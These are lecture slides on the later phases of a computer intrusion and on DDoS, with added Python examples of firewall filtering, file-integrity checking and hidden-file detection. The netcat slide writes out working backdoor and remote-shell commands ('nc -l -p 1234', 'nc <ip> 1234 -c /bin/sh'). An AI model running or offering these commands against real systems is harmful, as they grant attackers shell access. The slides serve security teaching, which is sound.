Summary From the Last Lecture
• Intrusions (vulnerability, exploit)
• Intrusion phases
  • Reconnaissance (non-technical, technical)
    • Interrogating DNS, split-horizon DNS
  • Scanning
    • Learn about live machines, open ports, firewall rules, network topology, OSes, vulnerabilities
    • NATs
    • Firewalls
  • Gaining access
    • Buffer overflow attacks
    • Sniffing
    • ARP poisoning, DNS poisoning
    • Spoofing TCP sessions
Announcements
• Midterm in two weeks
• Midterm review next week
  • We will go over two sample midterms, posted on the class Web page
  • Bring any questions you may have
• Reading list posted on the class Web page
Firewall Types
• Packet (stateless) firewall
  • Rules speak about IP/TCP header fields
  • No connection state kept
  • E.g. drop all traffic with TCP SYN and src IP from the outside
• Stateful firewall
  • Connection state is kept
  • E.g. drop all traffic except TCP ACK on established TCP connections
• Proxy firewall
  • Acts as a middleman to every connection, i.e. acts as the destination and the source for every connection
  • Can normalize protocols, reset TTL fields, etc.
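To make the difference between the first two firewall types concrete, here is an added simulation (not code from the lecture) of both rules from the slide: a stateless filter that decides on header fields alone, and a stateful filter that keeps a table of connections opened from inside. The addresses, the inside prefix 10.0.0.0/24 and the packet sequence are constructed for the example.

```python
from dataclasses import dataclass

# Assumed (constructed) addressing: the protected network is 10.0.0.0/24;
# anything else is "the outside".
INSIDE_PREFIX = "10.0.0."


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: frozenset  # TCP flags, e.g. frozenset({"SYN"}) or frozenset({"SYN", "ACK"})


def is_inside(ip):
    return ip.startswith(INSIDE_PREFIX)


def stateless_filter(pkt):
    """Packet (stateless) firewall: the slide's rule 'drop traffic with TCP SYN
    and a source IP from the outside'. Decides on header fields alone."""
    if not is_inside(pkt.src) and "SYN" in pkt.flags and "ACK" not in pkt.flags:
        return "DROP"
    return "ACCEPT"


class StatefulFirewall:
    """Stateful firewall: the slide's rule 'drop everything except TCP ACK on
    established connections'. Keeps a table of connections opened from inside."""

    def __init__(self):
        self.connections = set()  # (inside_ip, inside_port, outside_ip, outside_port)

    def filter(self, pkt):
        if is_inside(pkt.src):
            # Outbound: an inside host opening a connection creates state.
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
            if "SYN" in pkt.flags:
                self.connections.add(key)
            if "RST" in pkt.flags or "FIN" in pkt.flags:
                self.connections.discard(key)
            return "ACCEPT"
        # Inbound: accepted only if it is an ACK belonging to a known connection.
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if "ACK" in pkt.flags and key in self.connections:
            if "RST" in pkt.flags or "FIN" in pkt.flags:
                self.connections.discard(key)
            return "ACCEPT"
        return "DROP"


def compare(packets):
    """Run the same packet sequence through both firewalls and return the
    (stateless, stateful) verdict pairs in order."""
    stateful = StatefulFirewall()
    return [(stateless_filter(p), stateful.filter(p)) for p in packets]


# Constructed sample: inside host 10.0.0.2 opens a connection to 203.0.113.5,
# which replies with SYN/ACK; then 203.0.113.9 sends an unsolicited ACK (the
# shape of an ACK scan) and an unsolicited SYN.
SAMPLE = [
    Packet("10.0.0.2", "203.0.113.5", 50000, 80, frozenset({"SYN"})),
    Packet("203.0.113.5", "10.0.0.2", 80, 50000, frozenset({"SYN", "ACK"})),
    Packet("203.0.113.9", "10.0.0.2", 80, 50001, frozenset({"ACK"})),
    Packet("203.0.113.9", "10.0.0.2", 40000, 22, frozenset({"SYN"})),
]

if __name__ == "__main__":
    for pkt, verdicts in zip(SAMPLE, compare(SAMPLE)):
        print(pkt.src, "->", pkt.dst, sorted(pkt.flags), "stateless/stateful:", verdicts)
```

The third packet is the point of the exercise: an unsolicited ACK from outside passes the stateless rule, because nothing in its header says it is unsolicited, while the stateful firewall drops it because no inside host ever opened that connection.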
Phase 4: Maintaining Access
• Attacker establishes a listening application on a port (backdoor) so he can log on any time with or without a password
• Attackers frequently close security holes they find to stop others from taking over their compromised machines
Netcat Tool (Dangerous)
• Similar to the Linux cat command
• http://netcat.sourceforge.net/
• Client: Initiates connection to any port on remote machine
• Server: Listens on any port
• To open a shell on a victim machine
  On victim machine: nc -l -p 1234 /* This opens a backdoor */
  On attacker machine: nc 123.32.34.54 1234 -c /bin/sh /* This enters through a backdoor, opens a shell */
Netcat Tool
• Used for
  • Port scanning
  • Backdoor
  • Relaying the attack (stepping stones)
Trojans
• Application that claims to do one thing (and looks like it) but also does something malicious
• Users download Trojans from the Internet (thinking they are downloading a free game), or get them as greeting cards in e-mail, or as ActiveX controls when they visit a Web site
• Trojans can scramble your machine
• They can also open a backdoor on your system, steal data, misuse your machine, etc.
• They will report successful infection to the attacker
Back Orifice (Dangerous)
• Trojan application that can
  • Log keystrokes
  • Steal passwords
  • Create dialog boxes
  • Mess with files, processes or system (registry)
  • Redirect packets
  • Set up backdoors
  • Take over screen and keyboard
• http://www.bo2k.com/
Trojan Defenses
• Antivirus software
• Don’t download suspicious software
• Check the MD5 sum on trusted software you download
• Disable automatic execution of attachments
At the End of Maintaining Access
• The attacker has opened a backdoor and can now access the victim machine at any time
Phase 5: Covering Tracks
• Rootkits
• Alter logs
• Create hard-to-spot files
• Use covert channels
Application Rootkits
• Alter or replace system components (for instance DLLs)
  • E.g., on Linux the attacker replaces the ls program
• Rootkits frequently come together with sniffers:
  • Capture a few characters of all sessions on the Ethernet and write them into a file to steal passwords
  • Wouldn’t the administrator notice an interface in promiscuous mode?
  • Not if the attacker modifies an application that shows interfaces, e.g. netstat
Application Rootkits
• The attacker will modify all key system applications that could reveal his presence
  • List processes, e.g. ps
  • List files, e.g. ls
  • Show open ports, e.g. netstat
  • Show system utilization, e.g. top
• He will also substitute the modification date with one in the past
Defenses Against App. Rootkits
• Don’t let attackers gain root access
• Use integrity checking of files:
  • Carry a CD with md5sum, check hashes of system files against hashes advertised on the vendor site or hashes you stored before
  • Use Tripwire
    • Free integrity checker that saves md5 sums of all important files in a secure database (read-only CD), then verifies them periodically
    • http://www.tripwire.org/
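The baseline-and-verify procedure the slide describes (record hashes of trusted files, store them where the attacker cannot write, re-check later) is small enough to show in full. The following is an added example, not Tripwire's code or anything from the lecture: it builds a baseline, then simulates the application-rootkit scenario from the previous slide (ls replaced with its old modification date restored, netstat deleted) in a temporary directory and reports what changed. The slide mentions md5sum; SHA-256 is used as the default here, which is an assumption of the example, and any hashlib algorithm name works.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path

# The slide mentions md5sum; the same procedure works with any hashlib
# algorithm. SHA-256 as the default is this example's choice, not the page's.
DEFAULT_ALGORITHM = "sha256"


def hash_file(path, algorithm=DEFAULT_ALGORITHM):
    """Hash file contents in chunks. Only the bytes matter: a back-dated
    modification time (as on the previous slide) changes nothing here."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths, algorithm=DEFAULT_ALGORITHM):
    """Record hashes of trusted files. The result is plain JSON-able data so it
    can be written to read-only media (the slide's CD) with json.dumps()."""
    return {"algorithm": algorithm,
            "hashes": {str(Path(p)): hash_file(p, algorithm) for p in paths}}


def verify(baseline):
    """Re-hash every file in the baseline and classify it as ok, modified or missing."""
    report = {"ok": [], "modified": [], "missing": []}
    for path, expected in baseline["hashes"].items():
        if not os.path.exists(path):
            report["missing"].append(path)
        elif hash_file(path, baseline["algorithm"]) == expected:
            report["ok"].append(path)
        else:
            report["modified"].append(path)
    return report


def demo():
    """Constructed scenario in a temp dir: 'ls' is replaced (with its old
    mtime put back), 'netstat' removed, 'ps' untouched. Returns the report
    keyed by bare file name."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        originals = {"ls": b"original ls binary", "ps": b"original ps binary",
                     "netstat": b"original netstat binary"}
        for name, data in originals.items():
            (root / name).write_bytes(data)
        # Round-trip through JSON, as a baseline stored on a CD would be.
        baseline = json.loads(json.dumps(build_baseline(root / n for n in originals)))

        # Simulate the application rootkit: replace ls, restore its old mtime, delete netstat.
        ls = root / "ls"
        old_stat = ls.stat()
        ls.write_bytes(b"replaced ls that hides the attacker's files")
        os.utime(ls, (old_stat.st_atime, old_stat.st_mtime))
        (root / "netstat").unlink()

        report = verify(baseline)
        return {k: sorted(Path(p).name for p in v) for k, v in report.items()}


if __name__ == "__main__":
    print(demo())
```

Two points the code makes that the slide only implies: the check compares content hashes, so the back-dated modification time from the previous slide does not fool it, and the baseline must come from somewhere the attacker cannot rewrite, since a verifier that reads its expected hashes from the compromised disk proves nothing.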
Kernel Rootkits
• Replace system calls
  • Intercept calls to open one application with calls to open another, of the attacker’s choosing
• Now even checksums don’t help, as the attacker did not modify any system applications
• You won’t even see the attacker’s files in a file listing
• You won’t see some processes or open ports
• Usually installed as kernel modules
• Defenses: disable kernel modules
Altering Logs
• Attackers can:
  • Stop logging services
  • Load files into memory, change them
  • Restart the logging service
• Or simply change the log file through scripts
• Change login and event logs, command history file, last login data
Defenses Against Altering Logs
• Use separate log servers
  • Machines will send their log messages to these servers
• Encrypt log files
• Make log files append-only
• Save logs on write-once media
Creating Hard-to-Spot Files
• Names could look like system file names, but slightly changed
• Start with "."
• Start with "." and add spaces
• Make files hidden
• Defenses: intrusion detection systems and caution
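The "caution" the slide recommends can be partly automated: every naming trick listed above leaves a pattern a script can flag. Below is an added example (not from the lecture) that checks a directory listing for names made of dots only, a dot followed by spaces, leading or trailing whitespace, control characters, and near-misses of well-known system program names. The list of system names and the sample listing are constructed for the example; in practice the names would come from os.listdir() and the reference list from the real /bin and /sbin.

```python
import difflib
import re

# Names an attacker might imitate (constructed list; a real deployment would
# use the actual contents of /bin, /sbin, etc.).
SYSTEM_NAMES = sorted({"bash", "ls", "netstat", "passwd", "ps", "sshd", "top"})
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def suspicious_name(name):
    """Return the list of reasons a file name matches one of the slide's
    hiding tricks; an empty list means nothing stood out."""
    if name in (".", ".."):
        return []  # the directory entries themselves
    reasons = []
    if name.startswith(".") and name.strip(".") == "":
        reasons.append("only dots")
    if name.startswith(".") and name[1:].strip() == "":
        reasons.append("dot followed by spaces")
    if name != name.strip():
        reasons.append("leading/trailing whitespace")
    if CONTROL_CHARS.search(name):
        reasons.append("control characters")
    # Near-miss of a system program name (e.g. "netsat" for "netstat"); an
    # exact match is a legitimate program and is not flagged.
    base = name.lstrip(".").strip()
    if base and base not in SYSTEM_NAMES:
        close = difflib.get_close_matches(base, SYSTEM_NAMES, n=1, cutoff=0.85)
        if close:
            reasons.append(f"looks like system name {close[0]!r}")
    return reasons


def scan(names):
    """Map each suspicious name to its reasons; clean names are left out."""
    findings = {}
    for name in names:
        reasons = suspicious_name(name)
        if reasons:
            findings[name] = reasons
    return findings


# Constructed directory listing: legitimate entries mixed with the patterns
# from the slide.
SAMPLE_LISTING = [".", "..", "ls", "ps", ".profile", "...", ". ", "netsat",
                  "passwd ", "\x07hidden", "lsof"]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_LISTING).items():
        print(repr(name), "->", "; ".join(reasons))
```

The similarity cutoff is deliberately strict so that ordinary dotfiles such as .profile and unrelated tools such as lsof are not reported; lowering it trades false positives for catching more creative misspellings.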
Denial of Service Attacks
• Unlike other forms of computer attacks, the goal isn’t access or theft of information or services
• The goal is to stop the service from operating
  • To deny service to legitimate users
  • Slowing down may be good enough
• This is usually a temporary effect that passes as soon as the attack stops
How Can a Service Be Denied?
• Lots of ways
  • Crash the machine
    • Or put it into an infinite loop
  • Crash routers on the path to the machine
  • Use up a key machine resource
  • Use up a key network resource
  • Deny another service needed for this one (DNS)
• Using up resources is the most common approach
High-level Attack Categorization
• Floods
• Congestion control exploits
• Unexpected header values
• Invalid content
• Invalid fragments
• Large packets
• Impersonation attacks
Simple Denial of Service
• One machine tries to bring down another machine
• There is a fundamental problem for the attacker:
  • The attack machine must be “more powerful” than the target machine to overload it, OR
  • The attacker uses approaches other than flooding
  • The target machine might be a powerful server
Denial of Service and Asymmetry
• Sometimes generating a request is cheaper than formulating a response, e.g. sending a bogus packet is cheaper than decrypting this packet and checking that it’s bogus
• If so, one attack machine can generate a lot of requests, and effectively multiply its power
• Not always possible to achieve this asymmetry
• This is called the amplification effect
DDoS “Solves” That Problem
• Use multiple machines to generate the workload
• For any server of fixed power, enough attack machines working together can overload it
• Enlist lots of machines and coordinate their attack on a single machine
Is DDoS a Real Problem?
• Yes, attacks happen every day
  • One study reported ~4,000 per week [1]
  • On a wide variety of targets
• Tend to be highly successful
  • There are very few mechanisms that can stop certain attacks
• There have been successful attacks on major commercial sites

[1] “Inferring Internet Denial of Service Activity,” Moore, Voelker, and Savage, Usenix Security Symposium, 2002
DDoS on Twitter
• August 2009, hours-long service outage
• 44 million users affected
• At the same time Facebook, LiveJournal, YouTube and Blogger were under attack
  • Only some users experienced an outage
• Real target: a Georgian blogger
(Image borrowed from a Wired.com article, originally provided by Arbor Networks.)
DDoS on Mastercard and Visa
• December 2010
• Parts of services went down briefly
• Attack launched by a group of vigilantes called Anonymous
  • Bots recruited through social engineering
  • Directed to download DDoS software and take instructions from a master
• Motivation: Payback to services that cut their support of WikiLeaks after their founder was arrested on unrelated charges
• Several other services affected
Potential Effects of DDoS Attacks
• Most (if not all) sites could be rendered non-operational
• The Internet could be largely flooded with garbage traffic
• Essentially, the Internet could grind to a halt
  • In the face of a very large attack
• Almost any site could be put out of business
  • With a moderate-sized attack
Who Is Vulnerable?
• Everyone connected to the Internet can be attacked
• Everyone who uses the Internet for crucial operations can suffer damages
But My Machines Are Well Secured!
Doesn’t matter!
The problem isn’t your vulnerability, it’s everyone else’s
But I Have a Firewall!
Doesn’t matter!
Either the attacker slips his traffic into legitimate traffic, or he attacks the firewall
But I Use a VPN!
Doesn’t matter!
The attacker can fill your tunnel with garbage
Sure, you’ll detect it and discard it . . . but you’ll be so busy doing so that you’ll have no time for your real work
But I’m Heavily Provisioned
Doesn’t matter!
The attacker can probably get enough resources to overcome any level of resources you buy
Attack Toolkits
• Widely available on the net
  • Easily downloaded along with source code
  • Easily deployed and used
• Automated code for:
  • Scanning – detection of vulnerable machines
  • Exploit – breaking into the machine
  • Infection – placing the attack code
  • Rootkits
    • Hide the attack code
    • Restart the attack code
    • Keep open backdoors for attacker access
  • DDoS attack code
DDoS Attack Code
• Attacker can customize:
  • Type of attack
    • UDP flood, ICMP flood, TCP SYN flood, Smurf attack (broadcast ping flood)
    • Web server request flood, authentication request flood, DNS flood
  • Victim IP address
  • Duration
  • Packet size
  • Source IP spoofing
  • Dynamics (constant rate or pulsing)
  • Communication between master and slaves
Implications Of Attack Toolkits
• You don’t need much knowledge or great skills to perpetrate DDoS
• Toolkits allow unsophisticated users to become DDoS perpetrators in little time
• DDoS is, unfortunately, a game anyone can play
DDoS Attack Trends
• Attackers follow defense approaches, adjust their code to bypass defenses
  • Use of subnet spoofing defeats ingress filtering
  • Use of encryption and decoy packets, IRC or P2P obscures master-slave communication
  • Encryption of attack packets defeats traffic analysis and signature detection
  • Pulsing attacks defeat slow defenses and traceback
  • Flash-crowd attacks generate legitimate (well-formed) application traffic
Implications For the Future
• If we solve simple attacks, DDoS perpetrators will move on to more complex attacks
• Recently seen trends:
  • Larger networks of attack machines
  • Rolling attacks from a large number of machines
  • Attacks at higher semantic levels
  • Attacks on different types of network entities
  • Attacks on DDoS defense mechanisms
• Need flexible defenses that evolve with attacks
How Come We Have DDoS?
• Natural consequence of the way the Internet is organized
  • Best-effort service means routers don’t do much processing per packet and store no state – they will let anything through
  • The end-to-end paradigm means routers will enforce no security or authentication – they will let anything through
• It works really well when both parties play fair
• It creates an opportunity for DDoS when one party cheats
There Are Still No Strong Defenses Against DDoS
• You can make yourself harder to attack
  • But you can’t make it impossible
• And, if you haven’t made it hard enough, there’s not much you can do when you are attacked
  • There are no patches to apply
  • There is no switch to turn
  • There might be no filtering rule to apply
  • Grin and bear it